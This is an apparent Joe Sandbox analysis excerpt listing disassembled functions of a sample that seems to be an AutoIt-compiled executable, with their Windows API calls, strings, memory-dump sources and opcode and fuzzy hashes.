                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: Combobox
                                    • API String ID: 3850602802-2096851135
                                    • Opcode ID: 8a6e9ac954950de318c38c3f0b7b6e796c869df8c664360dbc63f2e1483d4d43
                                    • Instruction ID: 7a2c104be79dfb2756dacd76b7dc9a58515b20b91bec40dc61a030f642bf1341
                                    • Opcode Fuzzy Hash: 8a6e9ac954950de318c38c3f0b7b6e796c869df8c664360dbc63f2e1483d4d43
                                    • Instruction Fuzzy Hash: 54118671310108AFEF26DF58DC80EBB376EEB583A4F114129F91997290D7719C528760
                                    Function 001998FE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0014D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0014D1BA
                                      • Part of subcall function 0014D17C: GetStockObject.GDI32(00000011), ref: 0014D1CE
                                      • Part of subcall function 0014D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0014D1D8
                                    • GetWindowRect.USER32(00000000,?), ref: 00199968
                                    • GetSysColor.USER32(00000012), ref: 00199982
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                    • String ID: static
                                    • API String ID: 1983116058-2160076837
                                    • Opcode ID: 8c25a5d006a700d0958241c25239d885b44a101ffb97dc229b4c6cfea8944f7a
                                    • Instruction ID: d90edc59d0d5f18e240ec3fea09bff62aa6dea52c3686cabe3d6ab1ef57ca1e8
                                    • Opcode Fuzzy Hash: 8c25a5d006a700d0958241c25239d885b44a101ffb97dc229b4c6cfea8944f7a
                                    • Instruction Fuzzy Hash: 9311267252020AAFDF04DFB8CC45AEA7BA8FB18358F01462CFD55E2250E735E850DB60
                                    Function 00199617 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetWindowTextLengthW.USER32(00000000), ref: 00199699
                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001996A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: LengthMessageSendTextWindow
                                    • String ID: edit
                                    • API String ID: 2978978980-2167791130
                                    • Opcode ID: 9b7ceaef61dbf402258dc935bd86744c9ab86ce6cf1ca9b9e285df7a6817685b
                                    • Instruction ID: f0bf0545d62876e7c74683a6882be14d9af7f72616ccb8c34756f40d135e17db
                                    • Opcode Fuzzy Hash: 9b7ceaef61dbf402258dc935bd86744c9ab86ce6cf1ca9b9e285df7a6817685b
                                    • Instruction Fuzzy Hash: CC118C71500108ABEF109F68EC40EEB3B6AEB15378F504328F965931E0D772DC909760
                                    Function 00175262 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 001752D5
                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001752F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: InfoItemMenu_memset
                                    • String ID: 0
                                    • API String ID: 2223754486-4108050209
                                    • Opcode ID: e6492902e3086e77236210786b5cf86f43e0aee8a592e2641e49af99539c37b4
                                    • Instruction ID: f2834786337b40a7617ae1f2bde007d983369aa930b7485c2a574e5fd1f5054e
                                    • Opcode Fuzzy Hash: e6492902e3086e77236210786b5cf86f43e0aee8a592e2641e49af99539c37b4
                                    • Instruction Fuzzy Hash: 4111E276A01614EBDB24DF98D904BAD77BBBB05790F098125E90DE72A0E3F0ED04CB90
                                    Function 00184D9F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00184DF5
                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00184E1E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Internet$OpenOption
                                    • String ID: <local>
                                    • API String ID: 942729171-4266983199
                                    • Opcode ID: 1ff62caf5e4cb81cd044f1b121434e4a77396534f54ec793185edc8f1feb8e93
                                    • Instruction ID: 690d750adc5d30e61fb923a0c66ebf439eb45d5fe303d990eb7f5375e0f77c97
                                    • Opcode Fuzzy Hash: 1ff62caf5e4cb81cd044f1b121434e4a77396534f54ec793185edc8f1feb8e93
                                    • Instruction Fuzzy Hash: 56117070501222FBDB299F91CC89EFBFBA8FF26755F10822AF51556540EB745A80CBE0
                                    Function 0018A82C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: htonsinet_addr
                                    • String ID: 255.255.255.255
                                    • API String ID: 3832099526-2422070025
                                    • Opcode ID: dc03bbba76419d0492eaeb132e838db1490d2a3665bec004cb757b6eb4c204cd
                                    • Instruction ID: 7250518e9d2f63333150f363bc18260147ab30b8894f01cb3459c6f5aa227203
                                    • Opcode Fuzzy Hash: dc03bbba76419d0492eaeb132e838db1490d2a3665bec004cb757b6eb4c204cd
                                    • Instruction Fuzzy Hash: 66014975200305ABDB14AF64C84AFADB364FF55314F108527F515A72D1D731E911CBA2
                                    Function 0016B781 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0016B7EF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: 0fe5384c4e28adf548adbec3595e9d986238b40cadc85af36c69333c97bf9dbe
                                    • Instruction ID: ffc7ba3a1abc5026bc6372494e514b55dce831af99a4679586ff64b2dde1c73e
                                    • Opcode Fuzzy Hash: 0fe5384c4e28adf548adbec3595e9d986238b40cadc85af36c69333c97bf9dbe
                                    • Instruction Fuzzy Hash: 4501FC71640114ABCB04EBA4DC52DFE737DBFA5350B04062DF462A72D2EB705918CB90
                                    Function 0016B67D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0016B6EB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: 3b2de17df61711b919a3b421133a80b078cffd916a73810825d94a3c7cf05089
                                    • Instruction ID: 8ab1feb5793865f4f9b30a16dd3257b2a973d3f412c13dea02f03384e50e3050
                                    • Opcode Fuzzy Hash: 3b2de17df61711b919a3b421133a80b078cffd916a73810825d94a3c7cf05089
                                    • Instruction Fuzzy Hash: 98016271A41108ABCB08EBA4DD62AFE73BD9F55344F500029F503B3191EB645E289BF5
                                    Function 0016B700 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 0016B76C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: be0170dddb58cfec7b81c5bae7fa8d5ae4699a2eae4066a329285d58d47cfdde
                                    • Instruction ID: 1f374a81d25c1de698e90520ebcc5e54f15bdc2a531ebc0d6ad199af3fb625ef
                                    • Opcode Fuzzy Hash: be0170dddb58cfec7b81c5bae7fa8d5ae4699a2eae4066a329285d58d47cfdde
                                    • Instruction Fuzzy Hash: 30018175A41108ABCB04EBA4DD63EFE73AC9B65344F500029F802B31D2EB645E699BB5
                                    Function 00177744 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ClassName_wcscmp
                                    • String ID: #32770
                                    • API String ID: 2292705959-463685578
                                    • Opcode ID: 14e47411c5fcf5309a6b3b8ce251c8317b8e7057cda8c5c044319ea05f03a014
                                    • Instruction ID: a81fa9a3f623c50af17d5fed4a2f4bdec43fcd288958676324d65d3b86682f98
                                    • Opcode Fuzzy Hash: 14e47411c5fcf5309a6b3b8ce251c8317b8e7057cda8c5c044319ea05f03a014
                                    • Instruction Fuzzy Hash: 0DE022736002242BD710EAA5AC09E8BFBACAB51760F000116B918D3081E770A64087D0
                                    Function 0016A631 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0016A63F
                                      • Part of subcall function 001513F1: _doexit.LIBCMT ref: 001513FB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Message_doexit
                                    • String ID: AutoIt$Error allocating memory.
                                    • API String ID: 1993061046-4017498283
                                    • Opcode ID: d21c5d420172d32168590e3672054a2ec3e858b57acd58f527762c54ac50016e
                                    • Instruction ID: ffe37f9640f589563cf2485192252f36df7582fa3e38aed7425c595412a03eaf
                                    • Opcode Fuzzy Hash: d21c5d420172d32168590e3672054a2ec3e858b57acd58f527762c54ac50016e
                                    • Instruction Fuzzy Hash: 82D05B313C472833D31536997C1BFCD764C9F25B65F041025FB48995D35BE6D99041D9
                                    Function 001AAE86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemDirectoryW.KERNEL32(?), ref: 001AACC0
                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 001AAEBD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: DirectoryFreeLibrarySystem
                                    • String ID: WIN_XPe
                                    • API String ID: 510247158-3257408948
                                    • Opcode ID: 7fb0e6bef353e69c2f908f93c7699f9151cee88e0dbf990bec260050a9a4f633
                                    • Instruction ID: 79b6083e46a95e9b3cbb3e7cfa17d2bf9b5b7b220593e391bc043b9b72eef5f0
                                    • Opcode Fuzzy Hash: 7fb0e6bef353e69c2f908f93c7699f9151cee88e0dbf990bec260050a9a4f633
                                    • Instruction Fuzzy Hash: FFE06D74C00149EFDF19DFA8E9449FCF7B8AF49300F508081E002B2664DB704A84DF22
                                    Function 00198698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001986A2
                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001986B5
                                      • Part of subcall function 00177A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00177AD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: a3ed0ffbe66f770984e29be69c6b974dde1c0cf388769fd5379bd9914f457c7e
                                    • Instruction ID: 300d54e417752b44ebbcf33154d01564f7ae1f0e84f9b38446a70ab4c0fbf2f5
                                    • Opcode Fuzzy Hash: a3ed0ffbe66f770984e29be69c6b974dde1c0cf388769fd5379bd9914f457c7e
                                    • Instruction Fuzzy Hash: C1D0C931384354B7E26C6771AC0BFCA6A289B14B11F154A15B649AA1D0DBA0A9808A64
                                    Function 001986CC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001986E2
                                    • PostMessageW.USER32(00000000), ref: 001986E9
                                      • Part of subcall function 00177A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00177AD0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: FindMessagePostSleepWindow
                                    • String ID: Shell_TrayWnd
                                    • API String ID: 529655941-2988720461
                                    • Opcode ID: a57daeedc0b8bc97e466c047ae068b43519534d4933c77d2b553cfb4d7bc2303
                                    • Instruction ID: 318cd3b1b91d245278af02902e65e9251f6385b591a8c63e36472507c1c4ec0e
                                    • Opcode Fuzzy Hash: a57daeedc0b8bc97e466c047ae068b43519534d4933c77d2b553cfb4d7bc2303
                                    • Instruction Fuzzy Hash: 1DD0C9313853547BF26D6771AC0BFCA6A289B14B11F154A15B649AA1D0DBA0A9808A64